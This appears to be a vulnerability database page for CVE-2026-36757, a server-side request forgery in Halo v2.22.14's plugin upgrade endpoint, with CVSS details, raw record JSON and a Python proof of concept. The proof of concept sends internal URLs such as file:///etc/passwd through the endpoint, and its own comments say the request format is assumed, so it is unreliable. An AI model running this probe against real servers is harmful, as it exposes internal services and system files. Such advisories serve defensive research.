Security Vulnerability Report
中文
CVE-2026-36757 CVSS 4.3 MEDIUM

CVE-2026-36757

Published: 2026-04-30 17:16:26
Last Modified: 2026-04-30 18:16:28

Description

A Server-Side Request Forgery (SSRF) in the /plugins/{name}/upgrade-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Halo v2.22.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_ssrf(target_url, plugin_name, internal_url, auth_token): """ PoC for CVE-2026-36757 Exploit SSRF in /plugins/{name}/upgrade-from-uri """ headers = { "Authorization": f"Bearer {auth_token}", "User-Agent": "Mozilla/5.0" } # Construct the malicious URL based on the description # Assuming the URI is passed as a query parameter or path parameter depending on implementation # Here we simulate a request structure common in such endpoints exploit_endpoint = f"{target_url}/plugins/{plugin_name}/upgrade-from-uri" params = { "uri": internal_url # e.g., http://127.0.0.1:22 or file:///etc/passwd } try: response = requests.get(exploit_endpoint, headers=headers, params=params, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully to internal resource: {internal_url}") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Exploit failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") # Usage # exploit_ssrf("http://example.com:8090", "vulnerable-plugin", "http://127.0.0.1:8080", "YOUR_LOW_PRIV_TOKEN")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-36757", "sourceIdentifier": "[email protected]", "published": "2026-04-30T17:16:25.943", "lastModified": "2026-04-30T18:16:28.460", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-Side Request Forgery (SSRF) in the /plugins/{name}/upgrade-from-uri endpoint of halo v2.22.14 allows authenticated attackers to scan internal resources via a crafted GET request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf1/readme.md", "source": "[email protected]"}, {"url": "https://github.com/halo-dev/halo", "source": "[email protected]"}, {"url": "https://github.com/Arron-bit/Vul_report/blob/main/halo/ssrf1/readme.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}